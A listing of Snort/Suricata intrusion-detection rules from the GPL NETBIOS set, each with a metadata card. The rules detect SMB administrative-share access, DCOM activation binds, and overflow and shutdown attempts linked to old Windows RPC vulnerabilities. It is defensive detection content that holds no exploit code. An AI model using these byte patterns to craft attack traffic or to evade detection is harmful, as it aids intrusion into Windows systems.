alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS C$ unicode share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBu"; within:5; distance:3; byte_test:1,&,128,6,relative; byte_jump:2,34,little,relative; content:"C|00 24 00 00 00|"; distance:2; nocase; content:!"I|00|P|00|C|00 24 00 00 00|"; within:10; distance:-10; nocase; classtype:protocol-command-decode; sid:2102472; rev:11; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS C$ unicode share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 11

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102473

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB ADMIN$ unicode share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBu"; within:5; distance:3; byte_test:1,&,128,6,relative; byte_jump:2,34,little,relative; content:"A|00|D|00|M|00|I|00|N|00 24 00 00 00|"; distance:2; nocase; classtype:protocol-command-decode; sid:2102473; rev:9; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB ADMIN$ unicode share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 9

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102470

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB C$ unicode share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBu"; within:5; distance:3; byte_test:1,&,128,6,relative; byte_jump:2,34,little,relative; content:"C|00 24 00 00 00|"; distance:2; nocase; content:!"I|00|P|00|C|00 24 00 00 00|"; within:10; distance:-10; nocase; classtype:protocol-command-decode; sid:2102470; rev:12; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB C$ unicode share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 12

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102467

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB D$ unicode share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBu"; within:5; distance:3; byte_test:1,&,128,6,relative; byte_jump:2,34,little,relative; content:"D|00 24 00 00 00|"; distance:2; nocase; classtype:protocol-command-decode; sid:2102467; rev:9; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB D$ unicode share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 9

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102474

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS ADMIN$ share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBu"; within:5; distance:3; byte_test:1,!&,128,6,relative; byte_jump:2,34,little,relative; content:"ADMIN|24 00|"; distance:2; nocase; classtype:protocol-command-decode; sid:2102474; rev:9; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS ADMIN$ share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 9

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102475

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS ADMIN$ unicode share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBu"; within:5; distance:3; byte_test:1,&,128,6,relative; byte_jump:2,34,little,relative; content:"A|00|D|00|M|00|I|00|N|00 24 00 00 00|"; distance:2; nocase; classtype:protocol-command-decode; sid:2102475; rev:9; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS ADMIN$ unicode share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 9

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102471

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS C$ share access"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBu"; within:5; distance:3; byte_test:1,!&,128,6,relative; byte_jump:2,34,little,relative; content:"C|24 00|"; distance:2; nocase; content:!"IPC|24 00|"; within:5; distance:-5; nocase; classtype:protocol-command-decode; sid:2102471; rev:12; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS C$ share access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 12

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103425

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB CoGetInstanceFromFile attempt"; flow:established,to_server; flowbits:isset,dce.isystemactivator.bind; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 04|"; within:2; distance:19; content:"|5C 5C|"; byte_test:4,>,256,6; classtype:protocol-command-decode; sid:2103425; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB CoGetInstanceFromFile attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103426

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB CoGetInstanceFromFile little endian attempt"; flow:established,to_server; flowbits:isset,dce.isystemactivator.bind; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|04 00|"; within:2; distance:19; content:"|5C 5C|"; byte_test:4,>,256,6,little; classtype:protocol-command-decode; sid:2103426; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB CoGetInstanceFromFile little endian attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103177

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB CoGetInstanceFromFile little endian overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.msqueue; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|01 00|"; within:2; distance:19; byte_test:4,>,128,20,relative; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:attempted-admin; sid:2103177; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB CoGetInstanceFromFile little endian overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103176

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB CoGetInstanceFromFile overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.msqueue; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 01|"; within:2; distance:19; byte_test:4,>,128,20,relative; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:attempted-admin; sid:2103176; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB CoGetInstanceFromFile overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103427

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB CoGetInstanceFromFile unicode attempt"; flow:established,to_server; flowbits:isset,dce.isystemactivator.bind; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 04|"; within:2; distance:19; content:"|5C 00 5C 00|"; byte_test:4,>,256,8; classtype:protocol-command-decode; sid:2103427; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB CoGetInstanceFromFile unicode attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103428

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB CoGetInstanceFromFile unicode little endian attempt"; flow:established,to_server; flowbits:isset,dce.isystemactivator.bind; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|04 00|"; within:2; distance:19; content:"|5C 00 5C 00|"; byte_test:4,>,256,8,little; classtype:protocol-command-decode; sid:2103428; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB CoGetInstanceFromFile unicode little endian attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103179

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB CoGetInstanceFromFile unicode little endian overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.msqueue; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|01 00|"; within:2; distance:19; byte_test:4,>,256,20,relative; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:attempted-admin; sid:2103179; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB CoGetInstanceFromFile unicode little endian overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103178

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB CoGetInstanceFromFile unicode overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.msqueue; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 01|"; within:2; distance:19; byte_test:4,>,256,20,relative; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:attempted-admin; sid:2103178; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB CoGetInstanceFromFile unicode overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103377

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB IActivation bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; flowbits:set,dce.iactivation.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103377; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB IActivation bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103378

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB IActivation little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; flowbits:set,dce.iactivation.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103378; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB IActivation little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103379

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB IActivation unicode bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; flowbits:set,dce.iactivation.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103379; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB IActivation unicode bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103380

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB IActivation unicode little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; flowbits:set,dce.iactivation.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103380; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB IActivation unicode little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103393

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB ISystemActivator bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00|F"; within:16; distance:29; flowbits:set,dce.isystemactivator.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103393; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB ISystemActivator bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103396

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB ISystemActivator unicode little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00|F"; within:16; distance:29; flowbits:set,dce.isystemactivator.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103396; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB ISystemActivator unicode little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102942

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB InitiateSystemShutdown attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 18|"; within:2; distance:19; classtype:protocol-command-decode; sid:2102942; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB InitiateSystemShutdown attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102943

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB InitiateSystemShutdown little endian attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|18 00|"; within:2; distance:19; classtype:protocol-command-decode; sid:2102943; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB InitiateSystemShutdown little endian attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102944

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB InitiateSystemShutdown unicode attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 18|"; within:2; distance:19; classtype:protocol-command-decode; sid:2102944; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB InitiateSystemShutdown unicode attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102945

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB InitiateSystemShutdown unicode little endian attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|18 00|"; within:2; distance:19; classtype:protocol-command-decode; sid:2102945; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB InitiateSystemShutdown unicode little endian attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103256

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB IrotIsRunning attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.irot; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 02|"; within:2; distance:19; byte_jump:4,8,relative,little,align; byte_test:4,>,1024,0,little; reference:bugtraq,6005; reference:cve,2002-1561; reference:url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx; classtype:protocol-command-decode; sid:2103256; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB IrotIsRunning attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,6005|cve,2002-1561|url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103257

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB IrotIsRunning little endian attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.irot; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|02 00|"; within:2; distance:19; byte_jump:4,8,relative,little,align; byte_test:4,>,1024,0,little; reference:bugtraq,6005; reference:cve,2002-1561; reference:url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx; classtype:protocol-command-decode; sid:2103257; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB IrotIsRunning little endian attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,6005|cve,2002-1561|url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103258

